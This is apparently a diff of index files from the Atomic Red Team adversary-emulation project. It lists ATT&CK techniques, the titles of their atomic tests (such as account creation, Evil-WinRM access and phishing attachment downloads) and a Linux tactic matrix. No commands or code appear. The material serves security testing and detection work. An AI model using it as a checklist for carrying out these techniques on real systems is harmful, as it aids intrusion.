- T1072 Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1080 Taint Shared Content [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1021.005 VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1021.006 Windows Remote Management](../../T1021.006/T1021.006.md)
- Atomic Test #1: Enable Windows Remote Management [windows]
- Atomic Test #2: Invoke-Command [windows]
- Atomic Test #3: WinRM Access with Evil-WinRM [windows]
# initial-access
- T1195.003 Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1195.001 Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1195.002 Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1195.003 Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1195.001 Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1195.002 Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1078.001 Default Accounts](../../T1078.001/T1078.001.md)
- Atomic Test #1: Enable Guest account with RDP capability and admin privileges [windows]
- Atomic Test #2: Activate Guest Account [windows]
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1189 Drive-by Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1190 Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1133 External Remote Services](../../T1133/T1133.md)
- Atomic Test #1: Running Chrome VPN Extensions via the Registry 2 vpn extension [windows]
- T1200 Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1078.003 Local Accounts](../../T1078.003/T1078.003.md)
- Atomic Test #1: Create local account with admin privileges [windows]
- T1566 Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1091 Replication Through Removable Media](../../T1091/T1091.md)
- Atomic Test #1: USB Malware Spread Simulation [windows]
- Atomic Test #1: Enable Guest account with RDP capability and admin priviliges [windows]
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1189 Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1190 Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1133 External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1200 Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1078.003 Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1566 Phishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1091 Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1566.001 Spearphishing Attachment](../../T1566.001/T1566.001.md)
- Atomic Test #1: Download Macro-Enabled Phishing Attachment [windows]
- Atomic Test #1: Download Phishing Attachment - VBScript [windows]
- Atomic Test #2: Word spawned a command shell and used an IP address in the command line [windows]
- T1566.002 Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1566.003 Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1195 Supply Chain Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1199 Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1566.002 Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1566.003 Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1195 Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1199 Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
atomics/Indexes/Matrices/linux-matrix.md
+64 -85
View File
@@ -1,94 +1,73 @@
# Linux Atomic Tests by ATT&CK Tactic & Technique
| initial-access | execution | persistence | privilege-escalation | defense-evasion | credential-access | discovery | lateral-movement | collection | exfiltration | command-and-control | impact |
|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|
| [Cloud Accounts](../../T1078.004/T1078.004.md) | [At (Linux)](../../T1053.001/T1053.001.md) | [Account Manipulation](../../T1098/T1098.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [/etc/passwd and /etc/shadow](../../T1003.008/T1003.008.md) | Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Automated Exfiltration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Account Access Removal [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Add Office 365 Global Administrator Role [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [At (Linux)](../../T1053.001/T1053.001.md) | Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Transfer Size Limits](../../T1030/T1030.md) | Asymmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Container Administration Command](../../T1609/T1609.md) | Add-ins [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Binary Padding](../../T1027.001/T1027.001.md) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Archive Collected Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Bidirectional Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Container Orchestration Job](../../T1053.007/T1053.007.md) | [Additional Cloud Credentials](../../T1098.001/T1098.001.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Bash History](../../T1552.003/T1552.003.md) | Cloud Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Asymmetric Encrypted Non-C2 Protocol](../../T1048.002/T1048.002.md) | Commonly Used Port [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Destruction](../../T1485/T1485.md) |
| Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Cron](../../T1053.003/T1053.003.md) | [At (Linux)](../../T1053.001/T1053.001.md) | [Cloud Accounts](../../T1078.004/T1078.004.md) | Build Image on Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Cloud Infrastructure Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Archive via Library](../../T1560.002/T1560.002.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) |
| Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Deploy Container [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Container Orchestration Job](../../T1053.007/T1053.007.md) | [Clear Command History](../../T1070.003/T1070.003.md) | Cloud Instance Metadata API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Cloud Service Dashboard [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Drive-by Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) | [Container API](../../T1552.007/T1552.007.md) | Cloud Service Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | SSH [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Audio Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | DNS Calculation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Cron](../../T1053.003/T1053.003.md) | [Cloud Accounts](../../T1078.004/T1078.004.md) | [Credential Stuffing](../../T1110.004/T1110.004.md) | Cloud Storage Object Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | SSH Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Automated Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| External Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | JavaScript [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Browser Extensions](../../T1176/T1176.md) | Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Compile After Delivery](../../T1027.004/T1027.004.md) | [Credentials In Files](../../T1552.001/T1552.001.md) | Container and Resource Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Clipboard Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Malicious File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Cloud Account](../../T1136.003/T1136.003.md) | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Create Cloud Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Credentials from Password Stores [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Taint Shared Content [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Code Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Local Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Malicious Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Cloud Accounts](../../T1078.004/T1078.004.md) | Domain Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Create Snapshot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Credentials from Web Browsers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Confluence [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Compromise Client Software Binary [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Domain Trust Modification](../../T1484.002/T1484.002.md) | Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Email Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | VNC [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Staged [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Spearphishing Attachment [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Native API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Container Orchestration Job](../../T1053.007/T1053.007.md) | [Dynamic Linker Hijacking](../../T1574.006/T1574.006.md) | Delete Cloud Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [File and Directory Discovery](../../T1083/T1083.md) | Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data from Cloud Storage Object [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Network Device CLI [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Create Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Escape to Host](../../T1611/T1611.md) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | GUI Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Internet Connection Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Data from Configuration Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Encrypted Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Firmware Corruption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Python](../../T1059.006/T1059.006.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Deploy Container [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Local Account](../../T1087.001/T1087.001.md) | | Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Inhibit System Recovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Supply Chain Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Cron](../../T1053.003/T1053.003.md) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Disable Cloud Logs](../../T1562.008/T1562.008.md) | [Keylogging](../../T1056.001/T1056.001.md) | [Local Groups](../../T1069.001/T1069.001.md) | | Data from Local System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Traffic Duplication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Internal Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scripting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disable Crypto Hardware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Service Scanning](../../T1046/T1046.md) | | Data from Network Shared Drive [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transfer Data to Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Fast Flux DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | Disable or Modify Cloud Firewall [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Network Device Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Share Discovery](../../T1135/T1135.md) | | Data from Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | File Transfer Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | Source [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Local Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Disable or Modify System Firewall](../../T1562.004/T1562.004.md) | [Network Sniffing](../../T1040/T1040.md) | [Network Sniffing](../../T1040/T1040.md) | | Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Ingress Tool Transfer](../../T1105/T1105.md) | Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | [Systemd Timers](../../T1053.006/T1053.006.md) | [Dynamic Linker Hijacking](../../T1574.006/T1574.006.md) | Proc Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Disable or Modify Tools](../../T1562.001/T1562.001.md) | OS Credential Dumping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Password Policy Discovery](../../T1201/T1201.md) | | Email Forwarding Rule [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Internal Proxy](../../T1090.001/T1090.001.md) | [Resource Hijacking](../../T1496/T1496.md) |
| | [Unix Shell](../../T1059.004/T1059.004.md) | Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Process Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Password Cracking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | GUI Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Junk Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exchange Email Delegate Permissions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Ptrace System Calls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Password Guessing](../../T1110.001/T1110.001.md) | [Process Discovery](../../T1057/T1057.md) | | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | Visual Basic [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [RC Scripts](../../T1037.004/T1037.004.md) | [Domain Trust Modification](../../T1484.002/T1484.002.md) | Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote System Discovery](../../T1018/T1018.md) | | [Keylogging](../../T1056.001/T1056.001.md) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Service Stop [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Downgrade Attack [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Password Spraying](../../T1110.003/T1110.003.md) | [Security Software Discovery](../../T1518.001/T1518.001.md) | | [Local Data Staging](../../T1074.001/T1074.001.md) | | [Multi-hop Proxy](../../T1090.003/T1090.003.md) | Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
